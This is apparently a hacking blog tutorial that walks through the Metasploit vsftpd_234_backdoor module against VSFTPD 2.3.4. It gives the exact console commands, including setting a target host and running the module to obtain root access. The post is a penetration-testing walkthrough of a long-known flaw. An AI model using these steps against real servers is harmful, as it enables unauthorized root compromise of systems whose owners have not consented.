VSFTPD Backdoor Exploit using metasploit

Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It comes pre loaded in Kali linux. It is free and open source but some pro features require you to pay 2000$ to 30000$ per annum depending on the features that you require.

VSFTPD


VSFTPD is a GPL licensed FTP server for UNIX systems, including Linux. It is now secure and extremely fast.It supports IPv6 and SSL. We will exploit a vulnerability which was present in VSFTPD 2.3.4.

Exploit

1) Run terminal in Kali and enter the command
msfconsole
2) Incase you get an error , exit the metasploit and enter the command service postgresql start and the run the metasploit

3) You will see a screen like this


4) Now to search for exploit vsftpd, enter the command
search vsftpd
5) Incase a screen like the one shown below is different from the one you got, your metasploit is extremely outdated and you need to update it.

6) Now enter the command
use exploit/unix/ftp/vsftpd_234_backdoor
7) Now enter the command
show options
8) You will see a screen like the one below

 9) Now we need to set RHOST(the server which we want to target)

10) Enter the command(Assuming that we want to target 192.168.1.1
set RHOST 192.168.1.1
 11)Enter the command
run
12) If the server is vulnerable to this exploit, you will get the root access to it.

Always remember to use Kali for helpful purposes and not use it to cause harm.
Stay Safe.
Follow us on Facebook:- Facebook.com/VAPTHacker

Comments

Popular posts from this blog

Sniffing Android API

Bitcoin mining in nuclear lab

Uber Being Sued for $13.5 Million